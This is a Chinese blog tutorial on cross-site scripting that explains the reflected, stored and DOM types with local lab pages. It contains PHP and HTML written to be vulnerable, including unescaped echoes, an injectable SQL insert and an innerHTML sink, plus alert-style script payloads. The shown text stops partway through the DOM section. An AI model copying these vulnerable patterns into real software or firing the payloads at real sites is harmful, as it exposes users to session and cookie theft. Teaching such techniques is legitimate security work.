<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="前言什么是XSS跨站脚本(Cross-Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代码注入网页，其他用户在浏览网页时就会受到影响。恶意用户利用xss代码攻击成功后，可能得到很高的权限、私密网页内容、会话和cookie等各种内容。 XSS的危害XSS可能不如SQL注入、文件上传等漏洞能够直接得到较高权">
<meta property="og:type" content="article">
<meta property="og:title" content="XSS从0到1">
<meta property="og:url" content="http://mysecroad.github.io/posts/46185.html">
<meta property="og:site_name" content="忆时光">
<meta property="og:description" content="前言什么是XSS跨站脚本(Cross-Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代码注入网页，其他用户在浏览网页时就会受到影响。恶意用户利用xss代码攻击成功后，可能得到很高的权限、私密网页内容、会话和cookie等各种内容。 XSS的危害XSS可能不如SQL注入、文件上传等漏洞能够直接得到较高权">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/%E5%8F%8D%E5%B0%84.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/test.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/h1.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/%E6%BA%90%E4%BB%A3%E7%A0%811.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/html.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/script.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/liuyan.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/liuyan1.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/schema.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/hackerxss.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/alert.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/alert2.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/penter.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/e1.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/e12.png">
<meta property="og:image" content="http://mysecroad.github.io/posts/46185/e2.png">
<meta property="article:published_time" content="2020-04-27T13:31:06.000Z">
<meta property="article:modified_time" content="2020-05-02T12:27:46.736Z">
<meta property="article:author" content="ca5tle">
<meta property="article:tag" content="XSS">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://mysecroad.github.io/posts/46185/%E5%8F%8D%E5%B0%84.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/favicon.ico">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
          
        
    
    <!-- title -->
    <title>XSS从0到1</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
      
<link rel="stylesheet" href="/css/rtl.css">

    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="忆时光" type="application/atom+xml" />
    
<meta name="generator" content="Hexo 4.2.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fas fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fas fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="http://www.sectime.top:8888" target="_blank" rel="noopener">Img</a></li>
         
          <li><a href="/links/">Links</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="http://github.com/mysecroad" target="_blank" rel="noopener">Projects</a></li>
         
          <li><a href="/search/">Search</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/posts/39451.html"><i class="fas fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" href="/posts/51745.html"><i class="fas fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fas fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" href="#"><i class="fas fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" href="http://www.facebook.com/sharer.php?u=http://mysecroad.github.io/posts/46185.html" target="_blank" rel="noopener"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://twitter.com/share?url=http://mysecroad.github.io/posts/46185.html&text=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.linkedin.com/shareArticle?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://pinterest.com/pin/create/bookmarklet/?url=http://mysecroad.github.io/posts/46185.html&is_video=false&description=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=XSS从0到1&body=Check out this article: http://mysecroad.github.io/posts/46185.html"><i class="fas fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://getpocket.com/save?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://reddit.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.stumbleupon.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://digg.com/submit?url=http://mysecroad.github.io/posts/46185.html&title=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="http://www.tumblr.com/share/link?url=http://mysecroad.github.io/posts/46185.html&name=XSS从0到1&description=" target="_blank" rel="noopener"><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="https://news.ycombinator.com/submitlink?u=http://mysecroad.github.io/posts/46185.html&t=XSS从0到1" target="_blank" rel="noopener"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#前言"><span class="toc-number">1.</span> <span class="toc-text">前言</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#什么是XSS"><span class="toc-number">1.1.</span> <span class="toc-text">什么是XSS</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#XSS的危害"><span class="toc-number">1.2.</span> <span class="toc-text">XSS的危害</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS分类"><span class="toc-number">2.</span> <span class="toc-text">XSS分类</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#反射型XSS"><span class="toc-number">2.1.</span> <span class="toc-text">反射型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例"><span class="toc-number">2.1.1.</span> <span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#存储型XSS"><span class="toc-number">2.2.</span> <span class="toc-text">存储型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例-1"><span class="toc-number">2.2.1.</span> <span class="toc-text">实例</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#DOM型XSS"><span class="toc-number">2.3.</span> <span class="toc-text">DOM型XSS</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#实例-2"><span class="toc-number">2.3.1.</span> <span class="toc-text">实例</span></a></li></ol></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#触发标签与属性"><span class="toc-number">3.</span> <span class="toc-text">触发标签与属性</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#payloads"><span class="toc-number">4.</span> <span class="toc-text">payloads</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#简单粗暴的测试payload"><span class="toc-number">4.1.</span> <span class="toc-text">简单粗暴的测试payload</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#过滤测试"><span class="toc-number">4.2.</span> <span class="toc-text">过滤测试</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#基本混淆"><span class="toc-number">4.3.</span> <span class="toc-text">基本混淆</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#XSS靶场"><span class="toc-number">5.</span> <span class="toc-text">XSS靶场</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#web-for-pentester"><span class="toc-number">5.1.</span> <span class="toc-text">web for pentester</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-1-–-无任何过滤"><span class="toc-number">5.1.1.</span> <span class="toc-text">Example 1 – 无任何过滤</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-2-–-大小写绕过"><span class="toc-number">5.1.2.</span> <span class="toc-text">Example 2 – 大小写绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-3-–-嵌套绕过"><span class="toc-number">5.1.3.</span> <span class="toc-text">Example 3 – 嵌套绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-4-–-script直接被过滤，用其他标签"><span class="toc-number">5.1.4.</span> <span class="toc-text">Example 4 – script直接被过滤，用其他标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-5-–-String-fromCharCode编码绕过"><span class="toc-number">5.1.5.</span> <span class="toc-text">Example 5 – String.fromCharCode编码绕过</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-6-–-—–标签内-闭合标签"><span class="toc-number">5.1.6.</span> <span class="toc-text">Example 6 – —–标签内,闭合标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-7-–-标签内—–闭合标签"><span class="toc-number">5.1.7.</span> <span class="toc-text">Example 7 – 标签内—–闭合标签</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-8-–-有过滤，表单"><span class="toc-number">5.1.8.</span> <span class="toc-text">Example 8 – 有过滤，表单</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Example-9-–-直接在-后面添加alert-1"><span class="toc-number">5.1.9.</span> <span class="toc-text">Example 9 – 直接在#后面添加alert(1)</span></a></li></ol></li></ol></li></ol>
    </div>
  </span>
</div>

    
    <div class="content index py4">
        
        <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        XSS从0到1
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">ca5tle</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2020-04-27T13:31:06.000Z" itemprop="datePublished">2020-04-27</time>
        
        (Updated: <time datetime="2020-05-02T12:27:46.736Z" itemprop="dateModified">2020-05-02</time>)
        
      
    </div>


      
    <div class="article-category">
        <i class="fas fa-archive"></i>
        <a class="category-link" href="/categories/WEB/">WEB</a>
    </div>


      
    <div class="article-tag">
        <i class="fas fa-tag"></i>
        <a class="tag-link" href="/tags/XSS/" rel="tag">XSS</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><h3 id="什么是XSS"><a href="#什么是XSS" class="headerlink" title="什么是XSS"></a>什么是XSS</h3><p>跨站脚本(Cross-Site Scripting,简称为XSS或跨站脚本或跨站脚本攻击)是一种针对网站应用程序的安全漏洞攻击技术，是代码注入的一种。它允许恶意用户将代码注入网页，其他用户在浏览网页时就会受到影响。恶意用户利用xss代码攻击成功后，可能得到很高的权限、私密网页内容、会话和cookie等各种内容。</p>
<h3 id="XSS的危害"><a href="#XSS的危害" class="headerlink" title="XSS的危害"></a>XSS的危害</h3><p>XSS可能不如SQL注入、文件上传等漏洞能够直接得到较高权限，但是XSS的运用十分灵活，也会带来很大的危害：</p>
<ol>
<li>网络钓鱼</li>
<li>盗取cookie</li>
<li>劫持会话</li>
<li>强制弹出广告、刷流量</li>
<li>网页挂马</li>
<li>提升用户权限</li>
<li>配合其他漏洞，如CSRF</li>
<li>等等</li>
</ol>
<h2 id="XSS分类"><a href="#XSS分类" class="headerlink" title="XSS分类"></a>XSS分类</h2><p>XSS攻击可以分为三种： 反射型、存储型和DOM型。</p>
<p>反射型XSS：前端 –&gt; 后端 –&gt; 前端</p>
<p>存储型XSS：前端 –&gt; 后端 –&gt; 数据库 –&gt; 前端</p>
<p>DOM型XSS：前端</p>
<h3 id="反射型XSS"><a href="#反射型XSS" class="headerlink" title="反射型XSS"></a>反射型XSS</h3><p>反射型XSS又称非持久型XSS，这种攻击方式往往具有<strong>一次性</strong>。</p>
<p>攻击方式： 攻击者通过电子邮件等方式将包含XSS代码的恶意连接发送给目标用户。当目标用户访问该链接时，服务器接收该目标用户的请求并进行处理，然后服务器把带有xss代码的数据发送给目标用户的浏览器，浏览器解析这段xss代码，就会触发xss漏洞。</p>
<h4 id="实例"><a href="#实例" class="headerlink" title="实例"></a>实例</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;meta charset&#x3D;&quot;utf-8&quot;&gt;</span><br><span class="line">	&lt;title&gt;XSS&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;h1&gt;反射型XSS&lt;&#x2F;h1&gt;</span><br><span class="line">	&lt;form method&#x3D;&quot;get&quot;&gt;</span><br><span class="line">		&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;xss1&quot;&#x2F;&gt;</span><br><span class="line">		&lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;test&quot;&#x2F;&gt;</span><br><span class="line">	&lt;&#x2F;form&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">	error_reporting(0);</span><br><span class="line">	$xss &#x3D; $_GET[&#39;xss1&#39;];</span><br><span class="line">	if($xss1 &#x3D;&#x3D; null)&#123;</span><br><span class="line">		echo $xss;</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p><img src="/posts/46185/%E5%8F%8D%E5%B0%84.png" alt="反射"></p>
<p>在输入框中随便输入，发现可以输出出来。</p>
<p><img src="/posts/46185/test.png" alt="test"></p>
<p>我们在输入框中插入HTML标签 <code>&lt;h1&gt;test&lt;/h1&gt;</code></p>
<p><img src="/posts/46185/h1.png" alt="h1标签"></p>
<p>发现<code>&lt;h1&gt;&lt;/h1&gt;</code>并未输入，我们查看源代码</p>
<p><img src="/posts/46185/%E6%BA%90%E4%BB%A3%E7%A0%811.png" alt></p>
<p>可以看出<code>&lt;h1&gt;&lt;/h1&gt;</code>标签被<code>HTML</code>执行了。我们在插入一段<code>HTML</code>代码测试一下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">h1</span>&gt;</span>aaa<span class="tag">&lt;/<span class="name">h1</span>&gt;</span> <span class="tag">&lt;<span class="name">style</span>&gt;</span><span class="css"> <span class="selector-tag">h1</span> &#123; <span class="attribute">color</span>: orange; <span class="attribute">text-align</span>: center; &#125; </span><span class="tag">&lt;/<span class="name">style</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p><img src="/posts/46185/html.png" alt></p>
<p>发现我们输入的<code>html</code>代码确实被执行了。</p>
<p>我们再输入<code>js</code>脚本，<code>&lt;script&gt;&lt;/script&gt;</code></p>
<p><img src="/posts/46185/script.png" alt="script"></p>
<p>这就是一种典型的反射型XSS，我们可以发现，我们输入恶意代码暴露在URL参数中，并且时刻要求目标用户浏览方可触发。不过我们可以将包含漏洞的链接通过<strong>短网址缩短</strong>或者<strong>转换为二维码</strong>等形式灵活运用。</p>
<p><a href="http://127.0.0.1/xss/index.php?xss1=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E" target="_blank" rel="noopener">短连接生成</a></p>
<h3 id="存储型XSS"><a href="#存储型XSS" class="headerlink" title="存储型XSS"></a>存储型XSS</h3><p>存储型XSS和反射型XSS的差别仅在于：提交的XSS代码会存储在服务端（不管是数据库、内存还是文件系统等），下次请求目标页面时不用再提交XSS代码。最典型的例子是留言板XSS。</p>
<p>反射型 访问我们构造的链接</p>
<p>存储型 访问原网站链接</p>
<h4 id="实例-1"><a href="#实例-1" class="headerlink" title="实例"></a>实例</h4><p>我们在本地创建一个<code>xss</code>数据库，里面新建一个<code>messages</code>表，用来存放用户的留言信息，有三个字段：<code>id</code>、<code>username</code>、<code>message</code>。<code>id</code>设为主键，并勾选<strong>自动递增</strong> 。</p>
<p>前端、后端代码</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br></pre></td><td class="code"><pre><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html&gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">	&lt;meta charset&#x3D;&quot;utf-8&quot;&gt;</span><br><span class="line">	&lt;title&gt;XSS&lt;&#x2F;title&gt;</span><br><span class="line">&lt;&#x2F;head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">	&lt;!-- 前端用户输入表单 --&gt;</span><br><span class="line">	&lt;h1&gt;存储型XSS&lt;&#x2F;h1&gt;</span><br><span class="line">	&lt;form method&#x3D;&quot;post&quot;&gt;</span><br><span class="line">		&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;username&quot; placeholder&#x3D;&quot;姓名&quot;&#x2F;&gt;</span><br><span class="line">		&lt;input type&#x3D;&quot;text&quot; name&#x3D;&quot;message&quot; placeholder&#x3D;&quot;请输入您的留言&quot;&#x2F;&gt;</span><br><span class="line">		&lt;input type&#x3D;&quot;submit&quot; value&#x3D;&quot;test&quot;&#x2F;&gt;</span><br><span class="line">	&lt;&#x2F;form&gt;</span><br><span class="line">&lt;&#x2F;body&gt;</span><br><span class="line">&lt;&#x2F;html&gt;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">&lt;?php</span><br><span class="line">	&#x2F;*数据库信息配置*&#x2F;</span><br><span class="line">	$host &#x3D; &quot;localhost&quot;;</span><br><span class="line">	$port &#x3D; &quot;3306&quot;;</span><br><span class="line">	$user &#x3D; &quot;root&quot;;</span><br><span class="line">	$pwd &#x3D; &quot;root&quot;;</span><br><span class="line">	$dbname &#x3D; &quot;XSS&quot;;</span><br><span class="line">	$conn &#x3D; new mysqli($host, $user, $pwd, $dbname, $port);</span><br><span class="line"></span><br><span class="line">	&#x2F;*直接将留言插入到数据库中*&#x2F;</span><br><span class="line">	&#x2F;&#x2F; if isset($_POST[&#39;username&#39;] &amp;&amp; $_POST[&#39;message&#39;])&#123;</span><br><span class="line">	$username &#x3D; $_POST[&#39;username&#39;];</span><br><span class="line">	$message &#x3D; $_POST[&#39;message&#39;];</span><br><span class="line">	</span><br><span class="line">	if($username and $message)</span><br><span class="line">	&#123;</span><br><span class="line">		$sql &#x3D; &quot;insert into message(username, message) values (&#39;&#123;$username&#125;&#39;, &#39;&#123;$message&#125;&#39;)&quot;;</span><br><span class="line">		if($conn-&gt;query($sql) &#x3D;&#x3D;&#x3D; TRUE)</span><br><span class="line">		&#123;</span><br><span class="line">			echo &quot;留言成功&quot;.&quot;&lt;br&gt;&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">		else</span><br><span class="line">		&#123;</span><br><span class="line">			echo &quot;Error:&quot;.$sql.&quot;&lt;br&gt;&quot;.$conn-&gt;error;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else</span><br><span class="line">	&#123;</span><br><span class="line">		echo &quot;请填写完整信息&quot;.&quot;&lt;br&gt;&quot;;</span><br><span class="line">	&#125;</span><br><span class="line"></span><br><span class="line">	&#x2F;*查询数据库中的留言*&#x2F;</span><br><span class="line">	$sql &#x3D; &quot;select username, message from message&quot;;</span><br><span class="line">	$result &#x3D; $conn-&gt;query($sql);</span><br><span class="line">	if($result-&gt;num_rows &gt; 0)</span><br><span class="line">	&#123;</span><br><span class="line">		while($row &#x3D; $result-&gt;fetch_assoc())</span><br><span class="line">		&#123;</span><br><span class="line">			echo &quot;用户名：&quot;. $row[&#39;username&#39;]. &quot;留言内容：&quot;. $row[&#39;message&#39;].&quot;&lt;br&gt;&quot;;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">	else</span><br><span class="line">	&#123;</span><br><span class="line">		echo &quot;暂无留言&quot;;</span><br><span class="line">	&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

<p>将以上代码保存为<code>php</code>文件，配置好数据库连接信息，通过http服务去访问，可以得到如下界面：</p>
<p><img src="/posts/46185/liuyan.png" alt="留言板"></p>
<p>我们先随便输入几条留言看看</p>
<p><img src="/posts/46185/liuyan1.png" alt></p>
<p>查看一下数据库</p>
<p><img src="/posts/46185/schema.png" alt></p>
<p>可以看到我们输入的数据已经插入到数据库中了。</p>
<p>那么我们能不能像上面一样，插入一些恶意代码呢？试一下</p>
<p>插入 <code>&lt;script&gt;alert(&quot;hacker xss&quot;)&lt;/script&gt;</code></p>
<p><img src="/posts/46185/hackerxss.png" alt></p>
<p>我们插入的留言被执行了。看一下数据库，被插入到数据库中了。</p>
<p><img src="/posts/46185/alert.png" alt></p>
<p>我们换个浏览器试一下</p>
<p><img src="/posts/46185/alert2.png" alt></p>
<p>存储型XSS的攻击是最隐蔽的也是危害比较大的，普通用户所看的URL为<code>http://127.0.0.1/cunchuxss.php</code>，从URL上看均是正常的，但是当目标用户查看留言板时，那些留言的内容会从数据库查询出来并显示，浏览器发现有XSS代码，就当做正常的HTML与JS解析执行，于是就触发了XSS攻击。</p>
<h3 id="DOM型XSS"><a href="#DOM型XSS" class="headerlink" title="DOM型XSS"></a>DOM型XSS</h3><p>通过修改页面的DOM节点形成的XSS，称之为DOM XSS。它和反射型XSS、存储型XSS的差别在于，DOM XSS的XSS代码并不需要服务器解析响应的直接参与，触发XSS靠的就是浏览器端的DOM解析，可以认为完全是客户端的事情。</p>
<h4 id="实例-2"><a href="#实例-2" class="headerlink" title="实例"></a>实例</h4><p><code>HTML</code>代码</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;!DOCTYPE <span class="meta-keyword">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">meta</span> <span class="attr">charset</span>=<span class="string">"utf-8"</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">title</span>&gt;</span>dom xss<span class="tag">&lt;/<span class="name">title</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>&gt;</span></span><br><span class="line"><span class="actionscript">		<span class="function"><span class="keyword">function</span> <span class="title">change</span><span class="params">()</span></span>&#123;</span></span><br><span class="line"><span class="javascript">			<span class="built_in">document</span>.getElementById(<span class="string">"id1"</span>).innerHTML = <span class="built_in">document</span>.getElementById(<span class="string">"dom-input"</span>).value;</span></span><br><span class="line">		&#125;</span><br><span class="line">	<span class="tag">&lt;/<span class="name">script</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;<span class="name">center</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">h3</span> <span class="attr">id</span>=<span class="string">"id1"</span>&gt;</span>这里会显示输入的内容<span class="tag">&lt;/<span class="name">h3</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">form</span> <span class="attr">action</span>=<span class="string">""</span> <span class="attr">method</span>=<span class="string">"post"</span>&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"text"</span> <span class="attr">id</span>=<span class="string">"dom-input"</span> <span class="attr">placeholder</span>=<span class="string">"输入"</span>&gt;</span><span class="tag">&lt;<span class="name">br</span> /&gt;</span></span><br><span class="line">			<span class="tag">&lt;<span class="name">input</span> <span class="attr">type</span>=<span class="string">"button"</span> <span class="attr">onclick</span>=<span class="string">"change()"</span> <span class="attr">value</span>=<span class="string">"替换"</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">		<span class="tag">&lt;<span class="name">hr</span>&gt;</span></span><br><span class="line">	<span class="tag">&lt;/<span class="name">center</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<p>代码很简单，存在JS函数<code>change()</code>，该函数通过<code>DOM</code>操作将元素<code>id1</code>(输出位置)的内容修改为元素<code>dom_input</code>(输入位置)的内容。</p>
<p>DOM型XSS程序只有<code>HTML</code>代码，并不存在服务器端代码，所以此程序并没有与服务器端进行交互。</p>
<p>构造如下语句：</p>
